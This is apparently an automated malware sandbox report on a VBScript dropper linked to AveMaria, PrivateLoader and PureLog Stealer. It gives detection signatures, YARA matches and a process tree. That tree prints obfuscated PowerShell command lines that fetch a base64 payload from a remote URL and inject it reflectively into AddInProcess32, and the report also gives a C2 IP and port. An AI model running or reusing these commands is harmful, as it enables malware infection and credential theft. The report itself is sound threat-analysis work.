Edit tour
Windows
Analysis Report
89SkYNNpdi.vbs
Overview
General Information
| Sample name: | 89SkYNNpdi.vbsrenamed because original name is a hash value |
| Original sample name: | 3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b.vbs |
| Analysis ID: | 1523823 |
| MD5: | 8826da2dae531f219269ca314cec4f88 |
| SHA1: | a5c24e29d2b9901a0849fe4c70dd67733febcb57 |
| SHA256: | 3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b |
| Tags: | BlindEaglevbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
AveMaria, PrivateLoader, PureLog Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AveMaria stealer
Yara detected PrivateLoader
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7540 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\89SkY NNpdi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7816 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LigoR3YgJy pNRHIqJyku bmFNRVszLD ExLDJdLUpv aW4nJykgKC gnZGsnKyc3 dScrJ3JsIC crJz0gWVNE aHR0cHM6Ly 9pYTYwMDEw MC51cycrJy 5hJysncmNo aXZlLm9yZy 8yJysnNCcr Jy8nKydpdG Vtcy9kZXQn KydhaC0nKy dub3RlLXYv JysnRGV0YW gnKydOJysn b3RlVi50Jy sneHQnKydZ U0QnKyc7ZG s3JysnYicr J2FzZScrJz Y0Q28nKydu dGVuJysndC crJyA9ICcr JyhOZScrJ3 ctTycrJ2Jq ZScrJ2N0IC crJ1MnKyd5 cycrJ3RlJy snbS5OZScr J3QuV2ViQy crJ2xpZScr J250KS5Eb3 dubG8nKydh JysnZFMnKy d0cmluJysn ZyhkJysnaz d1Jysncmwn KycpO2QnKy drJysnN2Jp JysnbicrJ2 FyeUNvJysn bicrJ3Rlbi crJ3QgPSAn KydbU3lzdG UnKydtLkNv bnZlcnQnKy ddOicrJzon KydGcicrJ2 9tQmFzZTY0 UycrJ3RyaS crJ25nKGQn KydrJysnN2 JhcycrJ2U2 JysnNENvbn RlbicrJ3Qp O2RrNycrJ2 FzcycrJ2Vt JysnYmwnKy d5ID0nKycg WycrJ1InKy dlZmxlY3Qn Kydpb24uQX MnKydzJysn ZW1ibHldOi crJzpMJysn b2EnKydkKG RrN2Jpbicr J2FyeScrJ0 NvJysnbnRl bnQpOycrJ2 RrN3R5Jysn cCcrJ2UgPS AnKydkaycr JzcnKydhcy crJ3NlJysn bWJseS5HZS crJ3RUeXBl KCcrJ1knKy dTRFJ1Jysn blAnKydFJy snLkhvbScr J2VZJysnU0 QnKycpO2Rr N21ldGhvZC A9JysnIGRr NycrJ3R5cG UuJysnRycr J2UnKyd0TW V0aCcrJ29k KFlTRFZBSV lTRCknKyc7 ZGs3bWV0Jy snaCcrJ28n KydkLkknKy dudm9rZSgn KydkazduJy sndWxsLCcr JyBbb2JqJy snZWN0W11d JysnQCgnKy dZU0QnKyd0 eHQuJysnZX knKyduby92 JysnZWQuMn IuMzliMzQn Kyc1MzAyYT AnKyc3NWIx YmMnKycwJy snZDQnKyc1 YicrJzYzMi crJ2ViOScr J2UnKydlNj InKyctYnUn KydwLycrJy 86c3B0Jysn dGhZU0QgLC crJyBZU0Qn KydkZXNhdC crJ2knKyd2 JysnYWQnKy dvWVMnKydE ICwnKycgJy snWVNEJysn ZCcrJ2VzYS crJ3RpJysn dmFkbycrJ1 knKydTRCcr JyAsICcrJ1 lTRGRlc2F0 aXZhZG9ZJy snUycrJ0Qn KycsWScrJ1 NEQWRkJysn SW5QJysncm 8nKydjZXNz MycrJzJZU0 QsWVNEWVNE JysnKSknKS 5yRVBMYUNF KCdkazcnLF tzdFJpTmdd W0NoYVJdMz YpLnJFUExh Q0UoJ1lTRC csW3N0UmlO Z11bQ2hhUl 0zOSkgKQ== ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7848 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".((Gv '*MDr*'). naME[3,11, 2]-Join'') (('dk'+'7 u'+'rl '+' = YSDhttps ://ia60010 0.us'+'.a' +'rchive.o rg/2'+'4'+ '/'+'items /det'+'ah- '+'note-v/ '+'Detah'+ 'N'+'oteV. t'+'xt'+'Y SD'+';dk7' +'b'+'ase' +'64Co'+'n ten'+'t'+' = '+'(Ne' +'w-O'+'bj e'+'ct '+' S'+'ys'+'t e'+'m.Ne'+ 't.WebC'+' lie'+'nt). Downlo'+'a '+'dS'+'tr in'+'g(d'+ 'k7u'+'rl' +');d'+'k' +'7bi'+'n' +'aryCo'+' n'+'ten'+' t = '+'[Sy ste'+'m.Co nvert'+']: '+':'+'Fr' +'omBase64 S'+'tri'+' ng(d'+'k'+ '7bas'+'e6 '+'4Conten '+'t);dk7' +'ass'+'em '+'bl'+'y ='+' ['+'R '+'eflect' +'ion.As'+ 's'+'embly ]:'+':L'+' oa'+'d(dk7 bin'+'ary' +'Co'+'nte nt);'+'dk7 ty'+'p'+'e = '+'dk'+ '7'+'as'+' se'+'mbly. Ge'+'tType ('+'Y'+'SD Ru'+'nP'+' E'+'.Hom'+ 'eY'+'SD'+ ');dk7meth od ='+' dk 7'+'type.' +'G'+'e'+' tMeth'+'od (YSDVAIYSD )'+';dk7me t'+'h'+'o' +'d.I'+'nv oke('+'dk7 n'+'ull,'+ ' [obj'+'e ct[]]'+'@( '+'YSD'+'t xt.'+'ey'+ 'no/v'+'ed .2r.39b34' +'5302a0'+ '75b1bc'+' 0'+'d4'+'5 b'+'632'+' eb9'+'e'+' e62'+'-bu' +'p/'+'/:s pt'+'thYSD ,'+' YSD' +'desat'+' i'+'v'+'ad '+'oYS'+'D ,'+' '+'Y SD'+'d'+'e sa'+'ti'+' vado'+'Y'+ 'SD'+' , ' +'YSDdesat ivadoY'+'S '+'D'+',Y' +'SDAdd'+' InP'+'ro'+ 'cess3'+'2 YSD,YSDYSD '+'))').rE PLaCE('dk7 ',[stRiNg] [ChaR]36). rEPLaCE('Y SD',[stRiN g][ChaR]39 ) )" MD5: 04029E121A0CFA5991749937DD22A1D9) 
AddInProcess32.exe (PID: 6992 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Ave Maria, AveMariaRAT, avemaria | Information stealer which uses AutoIT for wrapping. |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| PrivateLoader | According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. | No Attribution |
{"C2 url": "109.248.151.156", "port": 2048, "Proxy Port": 5000, "Builder Id": "D6PX8E9W60"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security | ||
| Windows_Trojan_AveMaria_31d2bce9 | unknown | unknown |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security | ||
| Click to see the 15 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security | ||
| AveMaria_WarZone | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | Detects executables embedding command execution via IExecuteCommand COM object | ditekSHen |
| |
| MALWARE_Win_WarzoneRAT | Detects AveMaria/WarzoneRAT | ditekSHen |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 24 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||